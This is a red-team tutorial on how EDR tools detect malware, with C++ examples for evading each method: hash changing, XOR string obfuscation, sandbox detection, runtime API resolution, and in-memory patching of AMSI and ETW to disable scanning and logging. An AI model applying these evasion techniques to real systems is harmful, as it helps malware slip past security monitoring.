2. Let's understand EDR like a red team

1. EDR Detection & Bypass Techniques

1.1 Overview

Modern EDR solutions use multiple techniques to detect and mitigate cyber threats. Attackers use obfuscation, API unhooking, and direct syscalls to evade detection.

1.2 How EDR Detects Malicious Activity

Detection Area	Description
Signature-Based Detection	Uses hashes (SHA-256, MD5) to identify known malware.
Static Analysis	Searches for known malware strings (e.g., YARA rules).
Heuristic Detection	Uses sandboxing and rule-based analysis to predict malicious behavior.
Behavioral Analysis	Monitors process execution for malicious patterns.
Import Address Table (IAT) Inspection	Tracks API calls like `VirtualAllocEx`, `WriteProcessMemory`, `CreateRemoteThreadEx`.
Antimalware Scan Interface (AMSI)	Scans PowerShell scripts for known attack patterns.
Event Tracing for Windows (ETW)	Logs process execution, syscalls, and memory events for analysis.
API Hooking	Intercepts Windows API calls to detect process injection.
Network Monitoring	Detects beaconing, C2 traffic, and DNS tunneling.
Cloud Analysis	Virus Total + etc.

1.3 EDR Bypass Techniques & C++ Examples

1.3.1 Bypassing Signature-Based Detection

Concept: Since AV relies on hash signatures, modifying even one byte changes the file’s signature.

Example: Changing Code Structure in C++

#include <iostream>
#include <fstream>

void benignFunction() {
    std::cout << "This function is modified to change the hash!" << std::endl;
}

int main() {
    benignFunction();
    return 0;
}

To modify the hash:

Change function names.
Insert NOP operations or random comments.
Use different compilation flags.

Recompiling it changes the file hash, avoiding signature detection.

1.3.2 Bypassing Static Analysis

Concept: Security tools scan for known malware strings using YARA rules.

Example: XOR Obfuscation in C++

#include <iostream>
#include <string>

std::string xorEncryptDecrypt(const std::string &input, char key) {
    std::string output = input;
    for (size_t i = 0; i < input.size(); i++) {
        output[i] ^= key;
    }
    return output;
}

int main() {
    std::string payload = "mimikatz.exe"; // This would be detected
    std::string encoded = xorEncryptDecrypt(payload, 0xAA); // Obfuscate it
    std::cout << "Encoded String: " << encoded << std::endl;
    return 0;
}

Why this works:
- Static analysis won’t detect mimikatz.exe as it’s encoded.
- The real string is only revealed at runtime.

1.3.3 Bypassing Heuristic & Behavioral Analysis

Concept: Sandboxing & heuristic detection monitor malware behavior.

Example: Detecting Sandboxes in C++

#include <iostream>
#include <windows.h>
#include <lm.h> // For NetGetJoinInformation

#pragma comment(lib, "netapi32.lib")

bool isSandboxed() {
    LPWSTR domainName = NULL;
    NETSETUP_JOIN_STATUS status;
    if (NetGetJoinInformation(NULL, &domainName, &status) == NERR_Success) {
        NetApiBufferFree(domainName);
        return status != NetSetupDomainName; // Not in a domain? Likely a sandbox.
    }
    return true;
}

int main() {
    if (isSandboxed()) {
        std::cout << "Possible sandbox detected! Exiting..." << std::endl;
        return 0;
    }
    std::cout << "Running normally..." << std::endl;
    return 0;
}

Why this works:
- Most sandbox environments are not domain-joined.
- This check avoids execution in analysis environments.

1.3.4 Bypassing Import Address Table (IAT) Inspection

Concept: EDR inspects the IAT to detect malicious function calls.

Example: Dynamically Resolving API Calls

#include <iostream>
#include <windows.h>

typedef LPVOID(WINAPI *VirtualAllocEx_t)(HANDLE, LPVOID, SIZE_T, DWORD, DWORD);

int main() {
    HMODULE hKernel32 = LoadLibraryA("kernel32.dll");
    if (hKernel32) {
        VirtualAllocEx_t VirtualAllocEx_f = (VirtualAllocEx_t)GetProcAddress(hKernel32, "VirtualAllocEx");
        if (VirtualAllocEx_f) {
            LPVOID allocatedMemory = VirtualAllocEx_f(GetCurrentProcess(), NULL, 1024, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            std::cout << "Memory allocated dynamically!" << std::endl;
        }
    }
    return 0;
}

Why this works:
- Instead of listing VirtualAllocEx in the IAT, it is resolved at runtime.
- This prevents static analysis detection.

1.3.5 Bypassing AMSI (Antimalware Scan Interface)

Concept: AMSI scans PowerShell scripts & memory for known patterns.

Example: Patching AMSI in Memory

#include <iostream>
#include <windows.h>

void PatchAMSI() {
    HMODULE hAMSI = LoadLibraryA("amsi.dll");
    if (hAMSI) {
        FARPROC pAmsiScanBuffer = GetProcAddress(hAMSI, "AmsiScanBuffer");
        if (pAmsiScanBuffer) {
            DWORD oldProtect;
            VirtualProtect(pAmsiScanBuffer, 1, PAGE_EXECUTE_READWRITE, &oldProtect);
            *(BYTE*)pAmsiScanBuffer = 0xC3; // Patching AMSI function with "ret" instruction
            VirtualProtect(pAmsiScanBuffer, 1, oldProtect, &oldProtect);
        }
    }
}

int main() {
    PatchAMSI();
    std::cout << "AMSI patched!" << std::endl;
    return 0;
}

Why this works:
- Replaces AmsiScanBuffer with a RET instruction, bypassing AMSI scanning.
- Used in PowerShell attack scenarios.

1.3.6 Bypassing Event Tracing for Windows (ETW)

Concept: ETW logs malicious actions for analysis.

Example: Patching ETW to Avoid Logging

#include <iostream>
#include <windows.h>

void PatchETW() {
    HMODULE hNtdll = LoadLibraryA("ntdll.dll");
    if (hNtdll) {
        FARPROC pEtwEventWrite = GetProcAddress(hNtdll, "EtwEventWrite");
        if (pEtwEventWrite) {
            DWORD oldProtect;
            VirtualProtect(pEtwEventWrite, 1, PAGE_EXECUTE_READWRITE, &oldProtect);
            *(BYTE*)pEtwEventWrite = 0xC3; // Patch ETW with "ret"
            VirtualProtect(pEtwEventWrite, 1, oldProtect, &oldProtect);
        }
    }
}

int main() {
    PatchETW();
    std::cout << "ETW logging disabled!" << std::endl;
    return 0;
}

Why this works:
- Replaces EtwEventWrite with RET, preventing logging.